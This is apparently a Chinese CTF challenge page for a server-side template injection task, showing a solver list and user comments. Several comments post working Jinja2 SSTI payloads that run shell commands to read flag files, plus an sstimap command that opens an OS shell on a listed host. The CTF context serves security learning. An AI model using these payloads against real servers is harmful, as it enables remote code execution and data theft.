Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16545
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
薄言. 攻破了该题 1天前
Zfc 攻破了该题 1天前
周文君 攻破了该题 2天前
杰哥 攻破了该题 3天前
zhaoguanjei 攻破了该题 4天前
tqlhg 攻破了该题 4天前
GrantFly 攻破了该题 6天前
yezhongyu 攻破了该题 6天前
heting 攻破了该题 6天前
y-123456 攻破了该题 7天前
271199@ 攻破了该题 8天前
dacming9527 攻破了该题 8天前
ggtom 攻破了该题 9天前
1586905095 攻破了该题 9天前
serena7780 攻破了该题 12天前
CTF-大王 攻破了该题 16天前
Ahri 攻破了该题 16天前
奥特曼 攻破了该题 17天前
SQZ 攻破了该题 17天前
评论
suxiansheng 21天前
举报
详解参考https://mp.csdn.net/mp_blog/creation/editor/161513397
pipizhu 1月前
举报
?flag={{lipsum.__globals__['os'].popen('cat /app/flag').read()}}获取flag
bugku2026 2月前
举报
先通过?flag={{self.__dict__}}发现拥有lipsum,再通过?flag={{lipsum.__globals__.os.popen("cat /app/flag").read()}}获取flag
r1ng_13 3月前
举报
焚靖直接秒,比上一个SSTI还简单
网恋秀牛子被录屏导致自卑 5月前
举报
/?flag={{(OvO.__eq__.__globals__.sys.modules.os.popen('cat flag')).read()}}
liutong27 9月前
举报
python3 sstimap.py -u http://117.72.52.127:12369/?flag=1 --os-shell
wywitkey 1年前
举报
前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell
HK1ng 1年前
举报
详解:https://blog.csdn.net/m0_59527104/article/details/147013776
smtall 1年前
举报
flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}
hao7 1年前
举报
?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}